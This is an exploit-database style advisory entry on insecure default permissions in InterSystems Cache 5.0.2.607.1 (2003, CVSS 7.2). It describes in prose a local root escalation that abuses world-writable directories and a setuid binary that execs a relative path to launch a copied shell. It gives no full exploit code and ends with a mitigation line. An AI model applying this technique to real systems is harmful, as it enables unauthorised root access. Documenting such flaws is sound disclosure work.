vendor:
Cache
by:
kokaninATdtors
7.2
CVSS
HIGH
Insecure Default Permissions
264
CWE
Product Name: Cache
Affected Version From: 5.0.2.607.1
Affected Version To: 5.0.2.607.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2003
Insecure Default Permissions in InterSystems Cache
It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges. A snippetisnip from an strace of the cuxs binary shows: execve("../bin/cache", ["cache"], [/* 19 vars */]) which is stupid stupid stupid since cuxs is +s. A proof of concept exploit is provided which creates a directory called crapche/bin and copies the ash shell into it, then executes it using the cuxs binary.
Mitigation:
Ensure that all files and directories have appropriate permissions set.
